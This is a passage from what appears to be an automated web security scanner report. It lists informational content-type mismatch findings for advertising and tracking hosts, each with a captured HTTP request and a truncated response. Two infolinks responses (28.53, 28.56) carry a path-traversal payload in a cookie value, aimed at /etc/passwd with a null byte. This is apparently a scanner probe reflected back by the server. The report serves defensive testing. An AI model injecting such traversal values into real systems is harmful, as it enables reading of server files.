Expires: Fri, 23 Sep 2011 21:57:40 GMT
Date: Sat, 17 Sep 2011 00:58:03 GMT
Connection: close

BF_PARTNER.gate_response(1316209757);

28.45. http://pglb.buzzfed.com/63857/bb0a99aabad3110617eff2ef79bb3c27  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pglb.buzzfed.com
Path:   /63857/bb0a99aabad3110617eff2ef79bb3c27

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /63857/bb0a99aabad3110617eff2ef79bb3c27?callback=BF_PARTNER.gate_response&cb=6085 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 38
Cache-Control: max-age=574104
Expires: Fri, 23 Sep 2011 16:30:19 GMT
Date: Sat, 17 Sep 2011 01:01:55 GMT
Connection: close

BF_PARTNER.gate_response(1316190553);

28.46. http://pglb.buzzfed.com/63857/d9dfb925d83ec9decb12af7e255ebee7  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pglb.buzzfed.com
Path:   /63857/d9dfb925d83ec9decb12af7e255ebee7

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /63857/d9dfb925d83ec9decb12af7e255ebee7?callback=BF_PARTNER.gate_response&cb=984 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 38
Cache-Control: max-age=495992
Expires: Thu, 22 Sep 2011 18:45:50 GMT
Date: Sat, 17 Sep 2011 00:59:18 GMT
Connection: close

BF_PARTNER.gate_response(1316110396);

28.47. http://ping.crowdscience.com/ping.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ping.js?url=http%3A%2F%2Fwww.bradsdeals.com%2Fdealsoftheday%2Fsubscribe%2Fb%3Ftid%3D306656%26s%3Dadcom%7Cdisplay%7Ccomscore55-300redmixr-b%26utm_source%3Dadcom%26utm_medium%3Ddisplay%26utm_content%3D300redmixr-b%26utm_campaign%3Dcomscore55&id=5c5c650d27&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.220%20safari%2F535.1&x=1316239546152&c=0&t=0&v=0&m=0&vn=2.0.4 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:36:55 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=2a31db5320bf2a6b; Domain=.crowdscience.com; expires=Fri, 16 Dec 2011 01:36:55; Path=/
Content-Length: 869
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

document.cookie = '__cst=2e1725dcdf2570d7;path=/';
document.cookie = '__csv=2a31db5320bf2a6b|0;path=/;expires=' + new Date(new Date().getTime() + 7776000000).toGMTString();
if ('a71917903cb81aa6'!='1'
...[SNIP]...

28.48. http://ps2.newsinc.com/Playlist/show/90017/1564/1252.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ps2.newsinc.com
Path:   /Playlist/show/90017/1564/1252.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /Playlist/show/90017/1564/1252.xml HTTP/1.1
Host: ps2.newsinc.com
Proxy-Connection: keep-alive
Referer: http://assets.newsinc.com/flash/ndn_toppicks_widget.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Sat, 17 Sep 2011 01:05:00 GMT
Expires: -1
NDN-Server: PS05
NDN-SiteVer: 3.2.1
Pragma: no-cache
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 2.0
X-Powered-By: ASP.NET
Content-Length: 3018
Connection: keep-alive


<?xml version="1.0" encoding="UTF-8"?>
<ServiceResponse xmlns="http://permissiontv.com/v2.2/ptvml">
   <Status>200</Status>
   <Message>Success.</Message>
   
<Playlist>
<ID>1252</ID>
<Na
...[SNIP]...

28.49. http://ps2.newsinc.com/Playlist/show/90017/1957/507.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ps2.newsinc.com
Path:   /Playlist/show/90017/1957/507.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /Playlist/show/90017/1957/507.xml HTTP/1.1
Host: ps2.newsinc.com
Proxy-Connection: keep-alive
Referer: http://assets.newsinc.com/flash/ndn_toppicks_widget.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Sat, 17 Sep 2011 01:00:30 GMT
Expires: -1
NDN-Server: PS05
NDN-SiteVer: 3.2.1
Pragma: no-cache
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 2.0
X-Powered-By: ASP.NET
Content-Length: 3143
Connection: keep-alive


<?xml version="1.0" encoding="UTF-8"?>
<ServiceResponse xmlns="http://permissiontv.com/v2.2/ptvml">
   <Status>200</Status>
   <Message>Success.</Message>
   
<Playlist>
<ID>507</ID>
<Nam
...[SNIP]...

28.50. http://rt1302.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rt1302.infolinks.com
Path:   /action/doq.htm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

POST /action/doq.htm?pcode=utf-8&r=1316239041277.1 HTTP/1.1
Host: rt1302.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 9824
Origin: http://www.tmz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=3

makey=4b4e504c4d504f4c4d504f4e48514f4d4f484c4c4f4e494b49464d51697f7277&pimgs=justin%20timberlake%7Cnot%20my%20penis%21%7Cron%20artest%7Cname%20change%20official%7Csay%20hello%20to%20world%20peace%7Cmi
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec%00; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:13:40 GMT; Path=/
Set-Cookie: cnoi=299; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:13:40 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1596
Date: Sat, 17 Sep 2011 00:59:32 GMT
Connection: close

data=({rid:'da106062-18d8-449e-805a-c1785d15d58b',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec%00',sentences:{'make a move':{auth:{ssd:'-HV1HL9kugjkzUE9AaVYLNETMWONXG_mTmiDxu3QYm1C5j8_7XGRE9qJFNJdkoe8me
...[SNIP]...

28.51. http://rt1302.infolinks.com/action/getads.htm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rt1302.infolinks.com
Path:   /action/getads.htm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /action/getads.htm?lid=2&rid=da106062-18d8-449e-805a-c1785d15d58b&jsv=222.0.4&rts=1316239066211&bdc=1&cfv=10.3&prod_t=intext&sdata=make%20a%20move&ssd=2hAWURkIJ_4Kds6UXz8WznN_QzZNa4LBfSz7zrBLnZj6T2tXKUdAdSXXIuL_seS2dbU_ZFCbwoh9YlYKCjDYoQOhoiVPotApHz37yLFQrUZBj7NspVySPoNBTt03nMBOTHL4pxnayBF8i9niJ3xJY-bKwwT5OoYGYMJdaBrlT64ForO97xbWXA&sk=70&cs=9XaOKKLdbnq0zTFAwKWvjw HTTP/1.1
Host: rt1302.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cpc=100; Domain=infolinks.com; Expires=Sat, 17-Sep-2011 01:59:35 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 805
Date: Sat, 17 Sep 2011 00:59:35 GMT
Connection: close


INFOLINKS.setAdData( {
lid : "2",sentence : "make+a+move",
width : 0,height : 0,ads : [
{
template : 'text',

title : 'Mover',
text : 'Compar
...[SNIP]...

28.52. http://rt1701.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rt1701.infolinks.com
Path:   /action/doq.htm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

POST /action/doq.htm?pcode=utf-8&r=1316238789823.1 HTTP/1.1
Host: rt1701.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 6888
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=1

purl=http%3A%2F%2Fwww%2Etoofab%2Ecom%2Fnews%2F&makey=47425c40415c4340415c4342445d434143444040424a40464147405d69737677&ref=www%2Etoofab%2Ecom%2F2011%2F09%2F16%2Fexclusive%2Dmelissa%2Drivers%2Dsplits%2D
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:05:55 GMT; Path=/
Set-Cookie: cnoi=3; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:05:55 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1112
Date: Sat, 17 Sep 2011 00:51:48 GMT

data=({rid:'d1ea2b56-5fdd-49db-8dab-4fcf1e95e552',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'reproduction':{auth:{ssd:'Dh0IZuL4IgYIqeirAlxEjAfn7Youo56Z8NKXdeEB69xyms4gVwXeja3NOcEJpGwlHvwF
...[SNIP]...

28.53. http://rt1702.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rt1702.infolinks.com
Path:   /action/doq.htm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

POST /action/doq.htm?pcode=utf-8&r=1316239187592.1 HTTP/1.1
Host: rt1702.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 5152
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=5

by=f&jsv=222%2E0%2E4&plinks=news%7Cphotos%7Cvideos%7Cceleb%20couples%7Cceleb%20kids%7Ctv%7Cmovies%7Cmusic%7Cfashion%20%26%20beauty%7C2011%20emmys%7Csign%20up%7Csign%20in%7Cbritney%20spears%20wears%20r
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid="8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec"; Version=1; Domain=infolinks.com; Max-Age=2147483647; Expires=Thu, 05-Oct-2079 04:22:42 GMT; Path=/
Set-Cookie: cnoi=34; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:22:42 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1694
Date: Sat, 17 Sep 2011 01:08:35 GMT
Connection: close

data=({rid:'cca33222-1f55-4f3a-b220-79572031357e',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'partnership':{auth:{s
...[SNIP]...

28.54. http://rt1803.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rt1803.infolinks.com
Path:   /action/doq.htm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

POST /action/doq.htm?pcode=utf-8&r=1316238748131.1 HTTP/1.1
Host: rt1803.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 11273
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=0

makey=46435d41405d4241405d4243455c42404245414143444b40474b405c6971&phdrs=exclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7Ccomments%7C43%7Cyour%20comment%7Creply%20to%20comment%7Coriginal%20c
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:05:11 GMT; Path=/
Set-Cookie: cnoi=2; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:05:11 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1583
Date: Sat, 17 Sep 2011 00:51:03 GMT
Connection: close

data=({rid:'456b3667-d6af-420e-b04b-3efe353e8d3b',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'college':{auth:{ssd:'INLkywXFzH-0oXMvJOgZ5OF1Q756Yvd4u-KMPg-00vMF6YWYlF_3yByMSC4EaFOf4g7b8X7wu
...[SNIP]...

28.55. http://rt1901.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rt1901.infolinks.com
Path:   /action/doq.htm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

POST /action/doq.htm?pcode=utf-8&r=1316238723239.1 HTTP/1.1
Host: rt1901.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 6869
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

twnum=160&page%5Fkeyw=hollywood%20news%2Cred%20carpet%20fashion%2Ccelebrity%20hairstyles%2Ccelebrity%20beauty%20buzz%2Ccelebrity%20gossip%2Cacademy%20awards%2Coscars%2Ccelebrity%20makeup%2Ccelebrity%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:04:46 GMT; Path=/
Set-Cookie: cnoi=1; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:04:46 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1599
Date: Sat, 17 Sep 2011 00:50:39 GMT
Connection: close

data=({rid:'7fbf5229-56c4-45d9-9756-4d0d190b0283',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'reproduction':{auth:{ssd:'DKSkmBitGooNJ0g9jHlLv4GT0FIHNem2X3fUj7h7iiq3FrZzs4h8vskByE2Jz6KPrF2u
...[SNIP]...

28.56. http://rt1903.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rt1903.infolinks.com
Path:   /action/doq.htm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

POST /action/doq.htm?pcode=utf-8&r=1316239125575.1 HTTP/1.1
Host: rt1903.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 9173
Origin: http://www.tmz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=4

pdesc=%20justin%20timberlake%20wants%20to%20make%20it%20clear%2Cthe%20explicit%20picture%20on%20mila%20kunis%2Ccell%20phone%2Cshowing%20a%20penis%2Cis%20not%20j%2Ct%2Cthis%20according%20to%20a%E2%80%A
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid="8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec"; Version=1; Domain=infolinks.com; Max-Age=2147483647; Expires=Thu, 05-Oct-2079 04:15:48 GMT; Path=/
Set-Cookie: cnoi=33; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:15:48 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 2020
Date: Sat, 17 Sep 2011 01:01:40 GMT
Connection: close

data=({rid:'52e80464-4fd8-49bb-8883-b8102d9272e9',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'cell phone':{auth:{ss
...[SNIP]...

28.57. http://sales.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=11390142 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDCACTADQR=IIALCHHBHIDJODACFKHLBNOO

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=11390142
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1d91"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:53:06 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

28.58. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /sensor4.js?GID=15493;CRE=;PLA=;ADI=; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c; G15493=C1S99917-2-0-0-0-1315313090-0; G14853=C1S98373-1-0-0-0-1315398787-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:45 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G15493=C1S99917-3-0-0-0-1315313090-907675; path=/; domain=.suitesmart.com; expires=Thu, 15-Mar-2012 00:52:45 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Sat, 17 Sep 2011 00:52:45 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...

28.59. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A4%3A13&ranreq=0.8495062424335629&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fstar_tracks%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:02:48 GMT
Content-Length: 1861
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:02:48 GMT; path=/
Set-Cookie: pubfreq_27331_22455_875178760=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:42:48 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:02:48 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

